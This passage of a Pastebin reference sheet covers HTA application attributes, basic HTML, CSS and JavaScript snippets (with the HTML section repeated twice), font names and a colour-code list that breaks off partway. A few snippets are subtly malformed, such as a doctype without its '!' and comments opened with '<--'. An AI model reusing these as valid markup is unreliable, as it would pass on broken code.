Advertisement
Najeebsk

CMD.FM

Jan 5th, 2022
609
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 60.05 KB | None | 0 0
  1. [HELP]::-=-=-=-=-=-=-=-=-=-==-=-=-=-HELP-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  2. [HELP] => FIND /I "[COMMANDS]" %windir%\CMD.fm
  3. [HELP] => Exmple Help=COPY /? ; DIR /? ...
  4. [HELP] => %windir%\NirCmd.chm
  5. [HELP] => %windir%\Rar.exe Help /?
  6. [HELP] => %windir%\UnRaR.exe Help /?
  7. [HELP] => FIND "WORD" File.txt & Any Text File WORD Search
  8. [HELP]::-=-=-=-=-=-=-=-=-=-==-=-=-=-HELP END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  9. [COMMANDS] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-COMMANDS-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  10. [COMMANDS] => [CD]; [CLIP]; [DIR]; [ATTRIB]; [COPY]; [WMIC]; [NET]; [MD]
  11. [COMMANDS] => [FIND]; [VIRUS]; [NIRCMD]; [RAR]; [CSS]; [HTML]; [HTA]
  12. [COMMANDS] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-COMMANDS END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  13. [HTA] ::-=-=-=-=-=-=-=-=-=-==-=-=-=- HTA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  14. [HTA] EXMPLE=1
  15. [HTA] <HTA:APPLICATION
  16. [HTA] ICON="cmd.exe"
  17. [HTA] APPLICATIONNAME = "Microsoft Windows [version 7.1 7631] Copyright Simulation Dos © Najeeb © 2021"
  18. [HTA] BORDER="dialog"
  19. [HTA] BORDERSTYLE="complex"
  20. [HTA] SINGLEINSTANCE="yes"
  21. [HTA] WINDOWSTATE="maximize"
  22. [HTA] >
  23. [HTA] EXMPLE=2
  24. [HTA] <html>
  25. [HTA] <head>
  26. [HTA] <TITLE>MATRIX LOGIN © NAJEEB © 2021</TITLE>
  27. [HTA] <HTA:APPLICATION
  28. [HTA] APPLICATIONNAME="MATRIX LOGIN © NAJEEB © 2021"
  29. [HTA] VERSION="1.0.0.0"
  30. [HTA] BORDER="none" ; "Thin" ; "Dialog"
  31. [HTA] BORDERSTYLE="Complex" ; "Raised" ; "Static" ; "Sunken" ; "Normal"
  32. [HTA] INNERBORDER="no" ; "Yes"
  33. [HTA] CAPTION="no" ; "Yes"
  34. [HTA] SYSMENU="no" ; "Yes"
  35. [HTA] MAXIMIZEBUTTON="no" ; "Yes"
  36. [HTA] MINIMIZEBUTTON="no" ; "Yes"
  37. [HTA] ICON="NO" ; "cmd.exe" ; "C:\Windows\N.ico"
  38. [HTA] SCROLL="no" ; "Yes" ; "Auto"
  39. [HTA] SCROLLFLAT="yes" ; "No"
  40. [HTA] SINGLEINSTANCE="yes" ; "No"
  41. [HTA] WINDOWSTATE="maximize" ; "Normal" ; "Minimize"
  42. [HTA] SHOWINTASKBAR="no" ; "Yes"
  43. [HTA] CONTEXTMENU="no" ; "Yes"
  44. [HTA] SELECTION="no" ; "Yes"
  45. [HTA] NAVIGABLE="no" ; "Yes"
  46. [HTA] ID="oHTA"
  47. [HTA] />
  48. [HTA] ::-=-=-=-=-=-=-=-=-=-==-=-=-=- HTA END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  49. [HTML]::-=-=-=-=-=-=-=-=-=-==-=-=-=-HTML-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  50. [HTML] <DOCTYPE html>
  51. [HTML] <html>
  52. [HTML] <-- Write your comments here -->
  53. [HTML] <head>
  54. [HTML] <canvas id="myCanvas" width="200" height="100" style="border:1px solid #000000;">
  55. [HTML] </canvas>
  56. [HTML] <title>My Page Title</title>
  57. [HTML] <link rel="icon" type="image/x-icon" href="/images/favicon.ico">
  58. [HTML] </head>
  59. [HTML] <body>
  60. [HTML] <iframe src="demo_iframe.htm" height="200" width="300" title="Iframe Example"></iframe>
  61. [HTML] <iframe src="demo_iframe.htm" name="iframe_a" title="Iframe Example"></iframe>
  62. [HTML] <p><a href="https://www.w3schools.com" target="iframe_a">W3Schools.com</a></p>
  63. [HTML] <script>
  64. [HTML] document.getElementById("demo").innerHTML = "Hello JavaScript";
  65. [HTML] </script>
  66. [HTML] <svg width="300" height="200">
  67. [HTML] <polygon points="100,10 40,198 190,78 10,78 160,198"
  68. [HTML] style="fill:lime;stroke:purple;stroke-width:5;fill-rule:evenodd;" />
  69. [HTML] </svg>
  70. [HTML] <svg width="100" height="100">
  71. [HTML] <circle cx="50" cy="50" r="40" stroke="green" stroke-width="4" fill="yellow" />
  72. [HTML] </svg>
  73. [HTML] <svg width="400" height="180">
  74. [HTML] <rect x="50" y="20" rx="20" ry="20" width="150" height="150"
  75. [HTML] style="fill:red;stroke:black;stroke-width:5;opacity:0.5" />
  76. [HTML] </svg>
  77. [HTML] <svg height="130" width="500">
  78. [HTML] <defs>
  79. [HTML] <linearGradient id="grad1" x1="0%" y1="0%" x2="100%" y2="0%">
  80. [HTML] <stop offset="0%" style="stop-color:rgb(255,255,0);stop-opacity:1" />
  81. [HTML] <stop offset="100%" style="stop-color:rgb(255,0,0);stop-opacity:1" />
  82. [HTML] </linearGradient>
  83. [HTML] </defs>
  84. [HTML] <ellipse cx="100" cy="70" rx="85" ry="55" fill="url(#grad1)" />
  85. [HTML] <text fill="#ffffff" font-size="45" font-family="Verdana" x="50" y="86">SVG</text>
  86. [HTML] Sorry, your browser does not support inline SVG.
  87. [HTML] </svg>
  88. [HTML] <table>
  89. [HTML] <tr>
  90. [HTML] <th>Company</th>
  91. [HTML] <th>Contact</th>
  92. [HTML] <th>Country</th>
  93. [HTML] </tr>
  94. [HTML] <tr>
  95. [HTML] <td>Alfreds Futterkiste</td>
  96. [HTML] <td>Maria Anders</td>
  97. [HTML] <td>Germany</td>
  98. [HTML] </tr>
  99. [HTML] <tr>
  100. [HTML] <td>Centro comercial Moctezuma</td>
  101. [HTML] <td>Francisco Chang</td>
  102. [HTML] <td>Mexico</td>
  103. [HTML] </tr>
  104. [HTML] </table>
  105. [HTML] <ul>
  106. [HTML] <li>Coffee</li>
  107. [HTML] <li>Tea</li>
  108. [HTML] <li>Milk</li>
  109. [HTML] </ul>
  110. [HTML] <pre>TEXT</pre>
  111. [HTML] <h1>This is a Heading</h1>H1 TO H6<br>
  112. [HTML] <p>This is a paragraph.</p>
  113. [HTML] Line Breaks<br>
  114. [HTML] <a href="https://www.w3schools.com">Visit W3Schools</a><br>
  115. [HTML] <a href="#C4">Jump to Chapter 4</a>
  116. [HTML] <img src="img_girl.jpg" width="500" height="600" alt="Flowers in Chania">
  117. [HTML] <div style="background-image: url('img_girl.jpg');">
  118. [HTML] </body>
  119. [HTML] </html>
  120. [HTML] ----------------------------------
  121. [HTML] <ul> Defines an unordered list
  122. [HTML] <ul style="list-style-type:disc;">
  123. [HTML] disc Sets the list item marker to a bullet (default)
  124. [HTML] circle Sets the list item marker to a circle
  125. [HTML] square Sets the list item marker to a square
  126. [HTML] none The list items will not be marked
  127. [HTML] <ol> Defines an ordered list
  128. [HTML] <ol type="1">
  129. [HTML] type="1" The list items will be numbered with numbers (default)
  130. [HTML] type="A" The list items will be numbered with uppercase letters
  131. [HTML] type="a" The list items will be numbered with lowercase letters
  132. [HTML] type="I" The list items will be numbered with uppercase roman numbers
  133. [HTML] type="i" The list items will be numbered with lowercase roman numbers
  134. [HTML] <li> Defines a list item
  135. [HTML] <dl> Defines a description list
  136. [HTML] <dt> Defines a term in a description list
  137. [HTML] <dd> Describes the term in a description list
  138. [HTML] HTML Formatting Elements
  139. [HTML] <b> - Bold text</b>
  140. [HTML] <strong> - Important text</strong>
  141. [HTML] <i> - Italic text</i>
  142. [HTML] <em> - Emphasized text</em>
  143. [HTML] <mark> - Marked text</mark>
  144. [HTML] <small> - Smaller text</small>
  145. [HTML] <del> - Deleted text</del>
  146. [HTML] <ins> - Inserted text</ins>
  147. [HTML] <sub> - Subscript text</sub>
  148. [HTML] <sup> - Superscript text/sup>
  149. [HTML] In this chapter we will go through the <blockquote>,<q>, <abbr>,
  150. [HTML] <address>,<cite>, and <bdo> HTML elements.
  151. [HTML] -----------------------------------------------
  152. [HTML] Here are the block-level elements in HTML: <div>Hello World</div>
  153. [HTML] <address><article><aside><blockquote><canvas><dd><div><dl><dt>
  154. [HTML] <fieldset><figcaption><figure><footer><form><h1>-<h6><header><hr>
  155. [HTML] <li><main><nav><noscript><ol><p><pre><section><table><tfoot><ul><video>
  156. [HTML] ----------------------------------------------------
  157. [HTML] Here are the inline elements in HTML: <span>Hello World</span>
  158. [HTML] <a><abbr><acronym><b><bdo><big><br><button><cite><code><dfn><em><i>
  159. [HTML] <img><input><kbd><label><map><object><output><q><samp><script><select>
  160. [HTML] <small><span><strong><sub><sup><textarea><time><tt><var>
  161. [HTML] ----------------------------------------------------------
  162. [HTML] Define the character set used:
  163. [HTML] <meta charset="UTF-8">
  164. [HTML] Define keywords for search engines:
  165. [HTML] <meta name="keywords" content="HTML, CSS, JavaScript">
  166. [HTML] Define a description of your web page:
  167. [HTML] <meta name="description" content="Free Web tutorials">
  168. [HTML] Define the author of a page:
  169. [HTML] <meta name="author" content="John Doe">
  170. [HTML] Refresh document every 30 seconds:
  171. [HTML] <meta http-equiv="refresh" content="30">
  172. [HTML] Setting the viewport to make your website look good on all devices:
  173. [HTML] <meta name="viewport" content="width=device-width, initial-scale=1.0">
  174. [HTML] -----------------------------------------------------------------
  175. [HTML] <form action="/action_page.php">
  176. [HTML] <label for="fname">First name:</label><br>
  177. [HTML] <input type="text" id="fname" name="fname" value="John"><br>
  178. [HTML] <label for="lname">Last name:</label><br>
  179. [HTML] <input type="text" id="lname" name="lname" value="Doe"><br><br>
  180. [HTML] <input type="submit" value="Submit">
  181. [HTML] </form>
  182. [HTML] ----------------------------------------------
  183. [HTML] <form>
  184. [HTML] <input type="checkbox" id="vehicle1" name="vehicle1" value="Bike">
  185. [HTML] <label for="vehicle1"> I have a bike</label><br>
  186. [HTML] <input type="checkbox" id="vehicle2" name="vehicle2" value="Car">
  187. [HTML] <label for="vehicle2"> I have a car</label><br>
  188. [HTML] <input type="checkbox" id="vehicle3" name="vehicle3" value="Boat">
  189. [HTML] <label for="vehicle3"> I have a boat</label>
  190. [HTML] </form>
  191. [HTML] -------------------
  192. [HTML] <p>Choose your favorite Web language:</p>
  193. [HTML] <form>
  194. [HTML] <input type="radio" id="html" name="fav_language" value="HTML">
  195. [HTML] <label for="html">HTML</label><br>
  196. [HTML] <input type="radio" id="css" name="fav_language" value="CSS">
  197. [HTML] <label for="css">CSS</label><br>
  198. [HTML] <input type="radio" id="javascript" name="fav_language" value="JavaScript">
  199. [HTML] <label for="javascript">JavaScript</label>
  200. [HTML] </form>
  201. [HTML] ---------------------
  202. [HTML] <form action="/action_page.php" novalidate>
  203. [HTML] <label for="email">Enter your email:</label>
  204. [HTML] <input type="email" id="email" name="email"><br><br>
  205. [HTML] <input type="submit" value="Submit">
  206. [HTML] </form>
  207. [HTML] -----------------------------------------------------
  208. [HTML] Here are the different input types you can use in HTML:
  209. [HTML] <input type="button">
  210. [HTML] <input type="checkbox">
  211. [HTML] <input type="color">
  212. [HTML] <input type="date">
  213. [HTML] <input type="datetime-local">
  214. [HTML] <input type="email">
  215. [HTML] <input type="file">
  216. [HTML] <input type="hidden">
  217. [HTML] <input type="image">
  218. [HTML] <input type="month">
  219. [HTML] <input type="number">
  220. [HTML] <input type="password">
  221. [HTML] <input type="radio">
  222. [HTML] <input type="range">
  223. [HTML] <input type="reset">
  224. [HTML] <input type="search">
  225. [HTML] <input type="submit">
  226. [HTML] <input type="tel">
  227. [HTML] <input type="text">
  228. [HTML] <input type="time">
  229. [HTML] <input type="url">
  230. [HTML] <input type="week">
  231. [HTML] --------------------------------------------------------
  232. [HTML] <video width="320" height="240" autoplay muted>
  233. [HTML] <source src="movie.mp4" type="video/mp4">
  234. [HTML] <source src="movie.ogg" type="video/ogg">
  235. [HTML] Your browser does not support the video tag.
  236. [HTML] </video>
  237. [HTML] <video width="320" height="240" autoplay>
  238. [HTML] <source src="movie.mp4" type="video/mp4">
  239. [HTML] <source src="movie.ogg" type="video/ogg">
  240. [HTML] Your browser does not support the video tag.
  241. [HTML] </video>
  242. [HTML] ------------------------------------------------
  243. [HTML] <audio controls autoplay>
  244. [HTML] <source src="horse.ogg" type="audio/ogg">
  245. [HTML] <source src="horse.mp3" type="audio/mpeg">
  246. [HTML] Your browser does not support the audio element.
  247. [HTML] </audio>
  248. [HTML] --------------------------------
  249. [HTML] <audio controls autoplay muted>
  250. [HTML] <source src="horse.ogg" type="audio/ogg">
  251. [HTML] <source src="horse.mp3" type="audio/mpeg">
  252. [HTML] Your browser does not support the audio element.
  253. [HTML] </audio>
  254. [HTML] -------------------------------------
  255. [HTML] <iframe width="420" height="315"
  256. [HTML] src="https://www.youtube.com/embed/tgbNymZ7vqY?autoplay=1&mute=1">
  257. [HTML] </iframe>
  258. [HTML] -----------------------
  259. [HTML] <iframe width="420" height="315"
  260. [HTML] src="https://www.youtube.com/embed/tgbNymZ7vqY?playlist=tgbNymZ7vqY&loop=1">
  261. [HTML] </iframe>
  262. [HTML] --------------------------------------------
  263. [HTML] <DOCTYPE HTML>
  264. [HTML] <html>
  265. [HTML] <head>
  266. [HTML] <script>
  267. [HTML] function allowDrop(ev) {
  268. [HTML] ev.preventDefault();
  269. [HTML] }
  270. [HTML] function drag(ev) {
  271. [HTML] ev.dataTransfer.setData("text", ev.target.id);
  272. [HTML] }
  273. [HTML] function drop(ev) {
  274. [HTML] ev.preventDefault();
  275. [HTML] var data = ev.dataTransfer.getData("text");
  276. [HTML] ev.target.appendChild(document.getElementById(data));
  277. [HTML] }
  278. [HTML] </script>
  279. [HTML] </head>
  280. [HTML] <body>
  281. [HTML] <div id="div1" ondrop="drop(event)" ondragover="allowDrop(event)"></div>
  282. [HTML] <img id="drag1" src="img_logo.gif" draggable="true" ondragstart="drag(event)" width="336" height="69">
  283. [HTML] </body>
  284. [HTML] </html>
  285. [HTML] --------------------------------------------
  286. [HTML] // Store
  287. [HTML] localStorage.setItem("lastname", "Smith");
  288. [HTML] // Retrieve
  289. [HTML] document.getElementById("result").innerHTML = localStorage.getItem("lastname");
  290. [HTML] --------------------------------------------
  291. [HTML] if (localStorage.clickcount) {
  292. [HTML] localStorage.clickcount = Number(localStorage.clickcount) + 1;
  293. [HTML] } else {
  294. [HTML] localStorage.clickcount = 1;
  295. [HTML] }
  296. [HTML] document.getElementById("result").innerHTML = "You have clicked the button " +
  297. [HTML] localStorage.clickcount + " time(s).";
  298. [HTML] --------------------------------------------
  299. [HTML] if (sessionStorage.clickcount) {
  300. [HTML] sessionStorage.clickcount = Number(sessionStorage.clickcount) + 1;
  301. [HTML] } else {
  302. [HTML] sessionStorage.clickcount = 1;
  303. [HTML] }
  304. [HTML] document.getElementById("result").innerHTML = "You have clicked the button " +
  305. [HTML] sessionStorage.clickcount + " time(s) in this session.";
  306. [HTML] --------------------------------------------
  307. [HTML] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-HTML-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  308. [HTML] <DOCTYPE html>
  309. [HTML] <html>
  310. [HTML] <-- Write your comments here -->
  311. [HTML] <head>
  312. [HTML] <canvas id="myCanvas" width="200" height="100" style="border:1px solid #000000;">
  313. [HTML] </canvas>
  314. [HTML] <title>My Page Title</title>
  315. [HTML] <link rel="icon" type="image/x-icon" href="/images/favicon.ico">
  316. [HTML] </head>
  317. [HTML] <body>
  318. [HTML] <iframe src="demo_iframe.htm" height="200" width="300" title="Iframe Example"></iframe>
  319. [HTML] <iframe src="demo_iframe.htm" name="iframe_a" title="Iframe Example"></iframe>
  320. [HTML] <p><a href="https://www.w3schools.com" target="iframe_a">W3Schools.com</a></p>
  321. [HTML] <script>
  322. [HTML] document.getElementById("demo").innerHTML = "Hello JavaScript";
  323. [HTML] </script>
  324. [HTML] <svg width="300" height="200">
  325. [HTML] <polygon points="100,10 40,198 190,78 10,78 160,198"
  326. [HTML] style="fill:lime;stroke:purple;stroke-width:5;fill-rule:evenodd;" />
  327. [HTML] </svg>
  328. [HTML] <svg width="100" height="100">
  329. [HTML] <circle cx="50" cy="50" r="40" stroke="green" stroke-width="4" fill="yellow" />
  330. [HTML] </svg>
  331. [HTML] <svg width="400" height="180">
  332. [HTML] <rect x="50" y="20" rx="20" ry="20" width="150" height="150"
  333. [HTML] style="fill:red;stroke:black;stroke-width:5;opacity:0.5" />
  334. [HTML] </svg>
  335. [HTML] <svg height="130" width="500">
  336. [HTML] <defs>
  337. [HTML] <linearGradient id="grad1" x1="0%" y1="0%" x2="100%" y2="0%">
  338. [HTML] <stop offset="0%" style="stop-color:rgb(255,255,0);stop-opacity:1" />
  339. [HTML] <stop offset="100%" style="stop-color:rgb(255,0,0);stop-opacity:1" />
  340. [HTML] </linearGradient>
  341. [HTML] </defs>
  342. [HTML] <ellipse cx="100" cy="70" rx="85" ry="55" fill="url(#grad1)" />
  343. [HTML] <text fill="#ffffff" font-size="45" font-family="Verdana" x="50" y="86">SVG</text>
  344. [HTML] Sorry, your browser does not support inline SVG.
  345. [HTML] </svg>
  346. [HTML] <table>
  347. [HTML] <tr>
  348. [HTML] <th>Company</th>
  349. [HTML] <th>Contact</th>
  350. [HTML] <th>Country</th>
  351. [HTML] </tr>
  352. [HTML] <tr>
  353. [HTML] <td>Alfreds Futterkiste</td>
  354. [HTML] <td>Maria Anders</td>
  355. [HTML] <td>Germany</td>
  356. [HTML] </tr>
  357. [HTML] <tr>
  358. [HTML] <td>Centro comercial Moctezuma</td>
  359. [HTML] <td>Francisco Chang</td>
  360. [HTML] <td>Mexico</td>
  361. [HTML] </tr>
  362. [HTML] </table>
  363. [HTML] <ul>
  364. [HTML] <li>Coffee</li>
  365. [HTML] <li>Tea</li>
  366. [HTML] <li>Milk</li>
  367. [HTML] </ul>
  368. [HTML] <pre>TEXT</pre>
  369. [HTML] <h1>This is a Heading</h1>H1 TO H6<br>
  370. [HTML] <p>This is a paragraph.</p>
  371. [HTML] Line Breaks<br>
  372. [HTML] <a href="https://www.w3schools.com">Visit W3Schools</a><br>
  373. [HTML] <a href="#C4">Jump to Chapter 4</a>
  374. [HTML] <img src="img_girl.jpg" width="500" height="600" alt="Flowers in Chania">
  375. [HTML] <div style="background-image: url('img_girl.jpg');">
  376. [HTML] </body>
  377. [HTML] </html>
  378. [HTML] ----------------------------------
  379. [HTML] <ul> Defines an unordered list
  380. [HTML] <ul style="list-style-type:disc;">
  381. [HTML] disc Sets the list item marker to a bullet (default)
  382. [HTML] circle Sets the list item marker to a circle
  383. [HTML] square Sets the list item marker to a square
  384. [HTML] none The list items will not be marked
  385. [HTML] <ol> Defines an ordered list
  386. [HTML] <ol type="1">
  387. [HTML] type="1" The list items will be numbered with numbers (default)
  388. [HTML] type="A" The list items will be numbered with uppercase letters
  389. [HTML] type="a" The list items will be numbered with lowercase letters
  390. [HTML] type="I" The list items will be numbered with uppercase roman numbers
  391. [HTML] type="i" The list items will be numbered with lowercase roman numbers
  392. [HTML] <li> Defines a list item
  393. [HTML] <dl> Defines a description list
  394. [HTML] <dt> Defines a term in a description list
  395. [HTML] <dd> Describes the term in a description list
  396. [HTML] HTML Formatting Elements
  397. [HTML] <b> - Bold text</b>
  398. [HTML] <strong> - Important text</strong>
  399. [HTML] <i> - Italic text</i>
  400. [HTML] <em> - Emphasized text</em>
  401. [HTML] <mark> - Marked text</mark>
  402. [HTML] <small> - Smaller text</small>
  403. [HTML] <del> - Deleted text</del>
  404. [HTML] <ins> - Inserted text</ins>
  405. [HTML] <sub> - Subscript text</sub>
  406. [HTML] <sup> - Superscript text/sup>
  407. [HTML] In this chapter we will go through the <blockquote>,<q>, <abbr>,
  408. [HTML] <address>,<cite>, and <bdo> HTML elements.
  409. [HTML] -----------------------------------------------
  410. [HTML] Here are the block-level elements in HTML: <div>Hello World</div>
  411. [HTML] <address><article><aside><blockquote><canvas><dd><div><dl><dt>
  412. [HTML] <fieldset><figcaption><figure><footer><form><h1>-<h6><header><hr>
  413. [HTML] <li><main><nav><noscript><ol><p><pre><section><table><tfoot><ul><video>
  414. [HTML] ----------------------------------------------------
  415. [HTML] Here are the inline elements in HTML: <span>Hello World</span>
  416. [HTML] <a><abbr><acronym><b><bdo><big><br><button><cite><code><dfn><em><i>
  417. [HTML] <img><input><kbd><label><map><object><output><q><samp><script><select>
  418. [HTML] <small><span><strong><sub><sup><textarea><time><tt><var>
  419. [HTML] ----------------------------------------------------------
  420. [HTML] Define the character set used:
  421. [HTML] <meta charset="UTF-8">
  422. [HTML] Define keywords for search engines:
  423. [HTML] <meta name="keywords" content="HTML, CSS, JavaScript">
  424. [HTML] Define a description of your web page:
  425. [HTML] <meta name="description" content="Free Web tutorials">
  426. [HTML] Define the author of a page:
  427. [HTML] <meta name="author" content="John Doe">
  428. [HTML] Refresh document every 30 seconds:
  429. [HTML] <meta http-equiv="refresh" content="30">
  430. [HTML] Setting the viewport to make your website look good on all devices:
  431. [HTML] <meta name="viewport" content="width=device-width, initial-scale=1.0">
  432. [HTML] -----------------------------------------------------------------
  433. [HTML] <form action="/action_page.php">
  434. [HTML] <label for="fname">First name:</label><br>
  435. [HTML] <input type="text" id="fname" name="fname" value="John"><br>
  436. [HTML] <label for="lname">Last name:</label><br>
  437. [HTML] <input type="text" id="lname" name="lname" value="Doe"><br><br>
  438. [HTML] <input type="submit" value="Submit">
  439. [HTML] </form>
  440. [HTML] ----------------------------------------------
  441. [HTML] <form>
  442. [HTML] <input type="checkbox" id="vehicle1" name="vehicle1" value="Bike">
  443. [HTML] <label for="vehicle1"> I have a bike</label><br>
  444. [HTML] <input type="checkbox" id="vehicle2" name="vehicle2" value="Car">
  445. [HTML] <label for="vehicle2"> I have a car</label><br>
  446. [HTML] <input type="checkbox" id="vehicle3" name="vehicle3" value="Boat">
  447. [HTML] <label for="vehicle3"> I have a boat</label>
  448. [HTML] </form>
  449. [HTML] -------------------
  450. [HTML] <p>Choose your favorite Web language:</p>
  451. [HTML] <form>
  452. [HTML] <input type="radio" id="html" name="fav_language" value="HTML">
  453. [HTML] <label for="html">HTML</label><br>
  454. [HTML] <input type="radio" id="css" name="fav_language" value="CSS">
  455. [HTML] <label for="css">CSS</label><br>
  456. [HTML] <input type="radio" id="javascript" name="fav_language" value="JavaScript">
  457. [HTML] <label for="javascript">JavaScript</label>
  458. [HTML] </form>
  459. [HTML] ---------------------
  460. [HTML] <form action="/action_page.php" novalidate>
  461. [HTML] <label for="email">Enter your email:</label>
  462. [HTML] <input type="email" id="email" name="email"><br><br>
  463. [HTML] <input type="submit" value="Submit">
  464. [HTML] </form>
  465. [HTML] -----------------------------------------------------
  466. [HTML] Here are the different input types you can use in HTML:
  467. [HTML] <input type="button">
  468. [HTML] <input type="checkbox">
  469. [HTML] <input type="color">
  470. [HTML] <input type="date">
  471. [HTML] <input type="datetime-local">
  472. [HTML] <input type="email">
  473. [HTML] <input type="file">
  474. [HTML] <input type="hidden">
  475. [HTML] <input type="image">
  476. [HTML] <input type="month">
  477. [HTML] <input type="number">
  478. [HTML] <input type="password">
  479. [HTML] <input type="radio">
  480. [HTML] <input type="range">
  481. [HTML] <input type="reset">
  482. [HTML] <input type="search">
  483. [HTML] <input type="submit">
  484. [HTML] <input type="tel">
  485. [HTML] <input type="text">
  486. [HTML] <input type="time">
  487. [HTML] <input type="url">
  488. [HTML] <input type="week">
  489. [HTML] --------------------------------------------------------
  490. [HTML] <video width="320" height="240" autoplay muted>
  491. [HTML] <source src="movie.mp4" type="video/mp4">
  492. [HTML] <source src="movie.ogg" type="video/ogg">
  493. [HTML] Your browser does not support the video tag.
  494. [HTML] </video>
  495. [HTML] <video width="320" height="240" autoplay>
  496. [HTML] <source src="movie.mp4" type="video/mp4">
  497. [HTML] <source src="movie.ogg" type="video/ogg">
  498. [HTML] Your browser does not support the video tag.
  499. [HTML] </video>
  500. [HTML] ------------------------------------------------
  501. [HTML] <audio controls autoplay>
  502. [HTML] <source src="horse.ogg" type="audio/ogg">
  503. [HTML] <source src="horse.mp3" type="audio/mpeg">
  504. [HTML] Your browser does not support the audio element.
  505. [HTML] </audio>
  506. [HTML] --------------------------------
  507. [HTML] <audio controls autoplay muted>
  508. [HTML] <source src="horse.ogg" type="audio/ogg">
  509. [HTML] <source src="horse.mp3" type="audio/mpeg">
  510. [HTML] Your browser does not support the audio element.
  511. [HTML] </audio>
  512. [HTML] -------------------------------------
  513. [HTML] <iframe width="420" height="315"
  514. [HTML] src="https://www.youtube.com/embed/tgbNymZ7vqY?autoplay=1&mute=1">
  515. [HTML] </iframe>
  516. [HTML] -----------------------
  517. [HTML] <iframe width="420" height="315"
  518. [HTML] src="https://www.youtube.com/embed/tgbNymZ7vqY?playlist=tgbNymZ7vqY&loop=1">
  519. [HTML] </iframe>
  520. [HTML] --------------------------------------------
  521. [HTML] <DOCTYPE HTML>
  522. [HTML] <html>
  523. [HTML] <head>
  524. [HTML] <script>
  525. [HTML] function allowDrop(ev) {
  526. [HTML] ev.preventDefault();
  527. [HTML] }
  528. [HTML] function drag(ev) {
  529. [HTML] ev.dataTransfer.setData("text", ev.target.id);
  530. [HTML] }
  531. [HTML] function drop(ev) {
  532. [HTML] ev.preventDefault();
  533. [HTML] var data = ev.dataTransfer.getData("text");
  534. [HTML] ev.target.appendChild(document.getElementById(data));
  535. [HTML] }
  536. [HTML] </script>
  537. [HTML] </head>
  538. [HTML] <body>
  539. [HTML] <div id="div1" ondrop="drop(event)" ondragover="allowDrop(event)"></div>
  540. [HTML] <img id="drag1" src="img_logo.gif" draggable="true" ondragstart="drag(event)" width="336" height="69">
  541. [HTML] </body>
  542. [HTML] </html>
  543. [HTML] --------------------------------------------
  544. [HTML] // Store
  545. [HTML] localStorage.setItem("lastname", "Smith");
  546. [HTML] // Retrieve
  547. [HTML] document.getElementById("result").innerHTML = localStorage.getItem("lastname");
  548. [HTML] --------------------------------------------
  549. [HTML] if (localStorage.clickcount) {
  550. [HTML] localStorage.clickcount = Number(localStorage.clickcount) + 1;
  551. [HTML] } else {
  552. [HTML] localStorage.clickcount = 1;
  553. [HTML] }
  554. [HTML] document.getElementById("result").innerHTML = "You have clicked the button " +
  555. [HTML] localStorage.clickcount + " time(s).";
  556. [HTML] --------------------------------------------
  557. [HTML] if (sessionStorage.clickcount) {
  558. [HTML] sessionStorage.clickcount = Number(sessionStorage.clickcount) + 1;
  559. [HTML] } else {
  560. [HTML] sessionStorage.clickcount = 1;
  561. [HTML] }
  562. [HTML] document.getElementById("result").innerHTML = "You have clicked the button " +
  563. [HTML] sessionStorage.clickcount + " time(s) in this session.";
  564. [HTML] --------------------------------------------
  565. [HTML] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-HTML END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  566. [HTML] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-FONT-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  567. [HTML] font-family: "Times New Roman", Times, serif;
  568. [HTML] font-family: Arial, Helvetica, sans-serif;
  569. [HTML] font-family: "Lucida Console", "Courier New", monospace;
  570. [HTML] font-family: verdana;Serif;Sans-serif;Monospace;Cursive;Fantasy
  571. [HTML] Times New Roman;Georgia;Garamond;Arial;Verdana;Helvetica;Courier New
  572. [HTML] Lucida Console;Monaco;Brush Script MT;Lucida Handwriting;Copperplate
  573. [HTML] Papyrus
  574. [HTML] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-FONT END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  575. [HTML] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-COLOR CODE-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  576. [HTML] AliceBlue(#F0F8FF);AntiqueWhite(#FAEBD7);Aqua(#00FFFF);Aquamarine(#7FFFD4);
  577. [HTML] Azure(#F0FFFF);Beige(#F5F5DC);Bisque(#FFE4C4);Black(#000000);BlanchedAlmond(#FFEBCD);
  578. [HTML] Blue(#0000FF);BlueViolet(#8A2BE2);Brown(#A52A2A);Brown(#A52A2A);BurlyWood(#DEB887);
  579. [HTML] CadetBlue(#5F9EA0);Chartreuse(#7FFF00);Chocolate(#D2691E);Coral(#FF7F50);
  580. [HTML] CornflowerBlue(#6495ED);Cornsilk(#FFF8DC);Crimson(#DC143C);Cyan(#00FFFF);
  581. [HTML] DarkBlue(#00008B);DarkCyan(#008B8B);DarkGoldenRod(#B8860B);DarkGray(#A9A9A9);
  582. [HTML] DarkGreen(#006400);DarkKhaki(#BDB76B);DarkMagenta(#8B008B);DarkOliveGreen(#556B2F);
  583. [HTML] DarkOrange(#FF8C00);DarkOrchid(#9932CC);DarkRed(#8B0000);DarkSalmon(#E9967A);
  584. [HTML] DarkSeaGreen(#8FBC8F);DarkSlateBlue(#483D8B);DarkSlateGray(#2F4F4F);DarkSlateGrey(#2F4F4F);
  585. [HTML] DarkTurquoise(#00CED1);DarkViolet(#9400D3);DeepPink(#FF1493);DeepSkyBlue(#00BFFF);
  586. [HTML] DimGray(#696969);DodgerBlue(#1E90FF);FireBrick(#B22222);FloralWhite(#FFFAF0);
  587. [HTML] ForestGreen(#228B22);Fuchsia(#FF00FF);Gainsboro(#DCDCDC);GhostWhite(#F8F8FF);
  588. [HTML] Gold(#FFD700);GoldenRod(#DAA520);Gray(#808080);Green(#008000);GreenYellow(#ADFF2F);
